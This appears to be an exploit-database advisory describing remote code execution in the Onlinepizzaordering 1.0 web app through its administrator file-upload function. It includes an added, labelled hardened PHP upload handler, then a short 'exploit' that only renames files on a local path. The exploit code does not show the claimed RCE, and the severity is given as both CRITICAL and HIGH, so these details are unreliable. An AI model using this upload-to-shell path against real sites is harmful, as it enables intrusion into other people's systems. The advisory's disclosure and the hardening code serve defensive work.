Exploit / Vulnerability Discovered: 2023-04-08 | Type: webapps | Platform: php
This exploit / vulnerability, Onlinepizzaordering 1.0 remote code execution (RCE), is for educational purposes only; if you use it, you do so at your own risk!
## Description:
A malicious user can request an account from the administrator of this system.
He can then use this vulnerability to destroy or gain access to all accounts on this system, or worse.
The malicious user can upload a very dangerous file to this server and execute it via a shell, because he can access the upload function from the administrator account.
The status is CRITICAL.

STATUS: HIGH Vulnerability
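
The root cause described above is an upload function that stores whatever it is given where the web server will execute it. The following hardened handler is an added example, not code from Onlinepizzaordering or from the advisory's author; the function name, the size limit, the image-only allow-list and the destination directory are assumptions.

```php
<?php
declare(strict_types=1);

// Assumption: the upload feature only needs images. Map of accepted
// content types to the extension the server will assign.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024; // hypothetical 2 MiB limit

/**
 * Validate one entry of $_FILES and store it under a server-chosen name.
 * $destDir is a hypothetical directory outside the web root (or one where
 * script execution is disabled). Returns the stored file name.
 */
function store_uploaded_image(array $file, string $destDir): string
{
    // Also rejects multi-file arrays, where 'error' is not an integer.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file sent');
    }
    // Only accept files PHP itself received via HTTP POST.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('File size out of range');
    }
    // Decide the type from the content, never from the client-supplied
    // file name or $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !array_key_exists($mime, ALLOWED_TYPES)) {
        throw new RuntimeException('File type not allowed');
    }
    // The client's name is discarded, so a ".php" extension cannot survive
    // even if the content check is fooled by a crafted image.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store upload');
    }
    return $name;
}
```

The handler should be called only after the session's role has been checked, since the description attributes the issue to a user reaching the administrator's upload function.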
[+] Exploit:
```php
<?php
// by nu11secur1ty - 2023
// Old name of the file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17";
// New name for the file
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos";
// Use the rename() function to rename the file
rename($old_name, $new_name);
```